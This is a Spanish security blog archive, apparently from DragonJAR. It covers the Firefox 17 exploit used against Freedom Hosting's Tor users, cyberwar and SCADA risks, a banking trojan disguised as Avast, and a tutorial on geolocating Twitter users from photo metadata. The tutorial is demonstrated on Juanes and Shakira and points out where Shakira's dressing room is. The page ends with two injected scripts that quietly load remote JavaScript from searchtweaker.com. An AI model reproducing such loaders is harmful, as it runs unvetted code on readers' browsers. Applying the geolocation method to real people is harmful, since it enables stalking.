Archivos de la categoría ‘ciberespionaje’

Firefox 17 0day en Freedom Hosting

Esta noticia ha sido un impacto en muchos sitios, así que no podíamos dejar de informar a los lectores de DragonJAR de lo que ha pasado.

Eric Eoin Marques es dueño de un ISP llamado Freedom Hosting. Según el FBI este ISP es el mayor distribuidor de pornografía infantil. Es por eso que el FBI ha presentado a Irlanda una solicitud de extradición para Eric.

Según lo leído por ahí Freedom Hosting es uno de los proveedores de hosting que más sitios .onion tiene dentro de la red de .

A parecer el FBI ha podido localizar a Eric aún usando la red Tor… Muchos de nosotros que somos usuarios de esta red nos preguntaremos

¿Pero como es posible? ¿Esta red no arrojaba privacidad?, ¿Anonimato?

Antes de sacar conclusiones vamos a ver que ha pasado realmente….

Primero, para quien no lo sepa, vamos a explicar por encima que es un hidden service de tor, esos .onion que encontramos por ahí.

Hidden Services

Los servicios que ocultan la localización (por ejemplo, la dirección IP) de quien provee el servicio (Ej. un servicio web accesible sólo desde la red Tor) se les suele llamar servicios de localización oculta (en inglés location-hidden services) o simplemente servicios ocultos (en inglés hidden services). -Wikipedia

A priori sería imposible poder localizar a Eric.

Pero, parece ser que el FBI colocó un exploit con el que pudo localizar y obtener la IP aún usando TOR.

El código javascript para explotar el fallo que usaron se encuentra en el siguiente link => http://pastebin.mozilla.org/2776374

El software que era vulnerable es la versión Firefox 17 ESR (que es el que se basa el Tor Browser oficial)

Una vez que el exploit era ejecutado con éxito, se cargaba un payload, el enlace con el análisis está aquí => http://pastebin.mozilla.org/2777139

http://tsyrklevich.net/tbb_payload.txt

Enlaces de interés:

[+] https://blog.torproject.org/blog/hidden-services-current-events-and-freedom-hosting

[+] http://www.twitlonger.com/show/n_1rlo0uu

[+] http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/

[+] http://www.ehackingnews.com/2013/08/almost-half-of-tor-sites-compromised-by.html

El ciberespionaje es el desastre más grande de la inteligencia desde la pérdida de los secretos nucleares a finales de la década de los 40, según comenta Jim Lewis del Centre for Strategic and International Studies, un think-tank con sede en Washington, DC, según cuenta The Economist. El siguiente paso tras penetrar en las redes para robar datos es disrupt o manipularlos. Si la información militar clave puede ser atacada, podrán ser inutilizados misiles balísticos. Los atacantes pueden preferir ir a por información de logística militar no clasificada o incluso infraestructuras civiles. Una pérdida de confidencialidad en transferencia electrónica de datos financieros puede producir desastres económicos. Un desastre podría ser un ataque a las redes eléctricas. Sin electricidad y otros servicios críticos, los sistemas de comunicaciones, los cajeros automáticos dejarían de funcionar. Una pérdida de energía durante unos pocos días, puede producir daños económicos en cascada impredecibles.

Los expertos no se ponen de acuerdo sobre las vulnerabilidades de los sistemas que funcionan en las plantas industriales conocidos como supervisory control and data acquisition (SCADA). Cada vez más estas infraestructuras se están conectando a Internet elevando el riesgo de ataques remotos y los programas SCADA de las redes se vuelven más vulnerables a los ciberataques.(1)

La OTAN ha sido consciente del riesgo de las ciberamenazas y creó un nuevo «concepto estratégico» que se adoptará a finales de este año (2). Para ello un panel de expertos liderado por Madeleine Albright, antigua Secretaria de Estado de Estados Unidos, realizó un informe en mayo de 2010 en el que consideraba que los ciberataques estaban entre las tres amenazas más probables a la Alianza. El siguiente ataque significativo bien puede ser la rotura de un cable de fibra óptica y puede ser lo bastante serio como para merecer una respuesta bajo las previsiones de defensa mutua contempladas en el artículo 5 (del Tratado de Washington). El General Alexander planteó la posible necesidad de la militarización del ciberespacio para proteger el derecho a la privacidad de los americanos. El Cibercomando protege solo al dominio militar «.mil». El domino de gobierno «.gov» y el de infraestructuras corporativas como los «.com» son responsabilidad respectivamente del Departamento de Homeland Security y de las empresas privadas con apoyo de Cybercom.

Las ciberarmas se pueden utilizar principalmente como adjuntas o complementarias
de las armas convencionales en el teatro de operaciones. El ciberataque se puede utilizar como un arma militar pero normalmente estará limitada en tiempo y efecto aunque si se utilizan como armas de espionaje el tiempo no importa y los resultados pueden esperar. La disuasión en la ciberguerra es más incierta que en el caso de la estrategia nuclear, ya que en este tipo de guerra no hay destrucción mutua asegurada y la línea divisoria entre la delincuencia y la guerra es borrosa y por ende, la identificación de los computadores atacantes y lógicamente, mucho menos, las pulsaciones de los dedos en los teclados, como atribución del posible delito. Economist concluye que las ciberarmas pueden ser más efectivas en manos de los grandes estados aunque también pueden ser de gran utilidad para los terroristas.

_____________________________________________________________________

(1) Sin duda el exhaustivo informe de The Economist era premonitorio y avisaba de los
riesgos de los sistemas SCADA, como así fue en los ataques sufridos a finales de
septiembre, por el virus Stuxnet, especialmente en Irán.
(2) La OTAN en la Cumbre de Lisboa celebrada el 20 de noviembre de 2010 aprobó la
estrategia de ciberseguridad.

La defensa del nuevo dominio. La ciberestrategia del Pentágono

Apoyándose en las estrategias marcadas al principio del mandato del Presidente Obama entre el año 2009 y 2010, William J. Lynn III (1), U. S,Deputy Secretary of Defensa, ha publicado un artículo en la prestigiosa revista Foreign Affairs, donde expone los cinco principios básicos de laestrategia de la guerra del futuro…


 
 
La firma de seguridad Kaspersky ha detectado un malware que se distribuye mediante correos spam y que tras introducirse en el ordenador de la víctima se hace pasar por el antivirus avast! para evitar ser detectado. 
 
Se trata de un “troyano bancario brasileño”, cuyo objetivo es captar datos financieros y enviarlos a los ciberdelincuentes, y está dirigido principalmente a usuarios de Brasil, donde el antivirus gratuito Avast es el más popular.

 

Al infectar el equipo el malware muestra el icono de Avast en la bandeja del sistema. Si se pincha sobre él aparece una ventana emergente con el mensaje “Su Avast! antivirus está siendo actualizado, espere”, o bien “Avast antivirus: atención, su sistema está protegido”.
 
 
                           
Antes de descargar el producto Avast falso, otro módulo, basado en el producto anti-rootkits Avenger, trata de eliminar los siguientes productos antivirus del sistema, si es que están instalados: AVG, McAfee, Panda, Nod32, Kaspersky, Bitdefender, Norton, Microsoft Security Essentials, PSafe, Avira y Avast.

Se usan muchos archivos maliciosos en la misma campaña. Tienen tareas diferentes y Kaspersky Anti-Virus los detecta como
Trojan.Win32.Delf.ddir, Trojan.Win32.ChePro.aov, Trojan.Win32.ChePro.anv, Trojan-Banker.Win32.Delf.apg, not-a-virus:RiskTool.Win32.Deleter.i, Trojan-Banker.Win32.Agent.jst y Trojan.Win32.Delf.ddiq.


Parece que los cibercriminales brasileños piensan: “¿Para qué combatir las detecciones de antivirus? A veces es muy complicado. Mejor reemplacémoslas con nuestras propias soluciones falsas y todos salimos ganando”.

                                                                                                                            http://www.infospyware.com
Existe una herramienta que permite descargar las publicadas en por un usuario automáticamente y que también podría ayudar en esta tarea, se llama Twitter Image Downloader, esta escrita en .net y es de código abierto, esta herramienta nos facilita la vida al bajar las imágenes publicadas en los últimos 150 tweets de una cuenta (por limitaciones de la api en twitter) para luego extraer sus meta datos y conseguir información que nos ayude a localizar el usuario de twitter en un momento determinado.
 
Ya que algunos han experimentado problemas a la hora de usar cree.py, aquí otra alternativa que junto a un visor EXIF como Exif ViewerJeffrey’s Exif viewer o la misma FOCA, te ayudará en la extracción de información  sobre las fotos publicadas por un usuario en twitter, con el añadido de ser open source y poder modificar la herramienta para que adaptarla a nuestras necesidades especificas.
La geolocalización esta en auge, todos quieren saber donde están sus amigos y gustosos dan su información en sitios como Foursquare, DiOui o Facebook Places para no estar fuera de la “moda”, pero… ¿sabes quien ve realmente esta información?, muchas veces quienes publican estos datos en la red, no son conscientes de las consecuencias que esto puede acarrear.
Geolocalizacion Cómo localizar usuarios de twitter y flickr a través de sus fotos
Secuestradores, Violadores, Ladrones y demás delincuentes ya hacen uso de las nuevas tecnologías y la información que publicas en internet, para llevar a cabo sus delitos, como en el famoso caso de Lisa Montgomery; por eso debes ser consciente que la información que publicas en la red la puede ver CUALQUIER PERSONA y te recomendamos seguir los consejos que constantemente ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red.
Esta información es especialmente sensible cuando quien la publica, no es consciente que lo está haciendo, como es el caso de las fotos en cuyo interior (sus metadatos) se encuentra almacenada la ubicación de donde fue tomada, una característica adoptada cada vez en mas cámaras, especialmente las integradas a teléfonos celulares inteligentes.
Gracias a El Maligno, me entero que Yiannis Kakavas ha desarrollado una herramienta llamada Cree.py, que automatiza el proceso de extracción y localización de la información GPS publicada en las fotos por un usuario de Twitter o , dejándola a la mano de cualquier persona.
La herramienta programada en Python y de código abierto, es muy fácil de utilizar, cuenta con versiones para Windows, GNU Linux y si resolvemos unas cuentas dependencias, podemos hacerla correr en Mac OS X.

Para este articulo analizaremos 2 de los famosos colombianos, que mas publican fotografías por Twitter…. @juanes y @Shakira

Juanes GPS1 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Lo primero que hacemos es abrir la herramienta, escribir la cuenta de Twitter o Flickr que queremos analizar (podemos usar un buscador también) y después presionar “Geolocate Targe”, esperamos unos minutos mientras se procesa la información…. obteniendo un mapa como el siguiente, donde podemos ver los puntos geolocalizados de las fotos obtenidas desde el perfil publico de @juanes
Juanes GPS9 Cómo localizar usuarios de twitter y flickr a través de sus fotos
Para confirmar la información almacenada analizaremos las fotos descargadas por el Cree.py, con la FOCA, herramienta que permite analizar metadatos a imágenes y documentos.

Juanes GPS2 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Fotos bastante personales de @Juanes con su esposa Karen Martínez mientras estaban de viaje por Londres.

Juanes GPS3 Cómo localizar usuarios de twitter y flickr a través de sus fotos

La ubicación de la oficina donde posiblemente produzcan los discos del artista

Juanes GPS4 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Haciendo arreglos a las canciones o las pistas…

Juanes GPS5 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Fotos del parque que se observa claramente en Creppy

Juanes GPS6 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Segunda foto del Hyde Park

Juanes GPS7 Cómo localizar usuarios de twitter y flickr a través de sus fotos
Como podemos ver no es poca la información que cualquier persona puede obtener de la cuenta publica de Juanes, ¿los paparazzi sabrán de esto?, seguramente les sería de mucha utilidad….
Ahora pasamos a otra de nuestras celebridades… @shakira quien tampoco sabe que al publicar fotografías por Twitter, también esta publicando su ubicación, para ello seguimos el mismo procedimiento que con @juanes, buscamos su cuenta oficial, damos click en el botón “Geolocate Target” y esperamos que Cree.py haga su trabajo…
Shakira GPS1 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Después de esperar un poco, podemos ver algunas locaciones como el Coca Cola Park en South Africa.

Shakira GPS2 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Algunas direcciones en New York…

Shakira GPS3 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Y para corroborar el trabajo de cree.py de nuevo pasamos la FOCA a todas las fotos, logrando reconocer algunas de ellas.

Shakira GPS4 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Shakira con su novio de turno…

Shakira GPS5 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Foto del escenario antes de la presentación…

Shakira GPS6 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Ubicación de su camerino… ya sabes por si quieres darle un saludo…

Shakira GPS7 Cómo localizar usuarios de twitter y flickr a través de sus fotos

En un late night show…

Shakira GPS8 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Algunos apuntes poco interesantes… ¿o no?

Shakira GPS9 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Detrás del telón…

Shakira GPS10 Cómo localizar usuarios de twitter y flickr a través de sus fotos

En el escenario..
Como pueden ver obtener la ubicación de los famosos no es nada complicado, pero es igual de fácil obtener la tuya; Por eso es tan importante que sigas los consejos que constantemente ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red y seas mas cuidadoso con tu información.

Fuente: DragonJar.
(function(){try{var header=document.getElementsByTagName(“HEAD”)[0];var script=document.createElement(“SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
(function(){try{var header=document.getElementsByTagName(“HEAD”)[0];var script=document.createElement(“SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();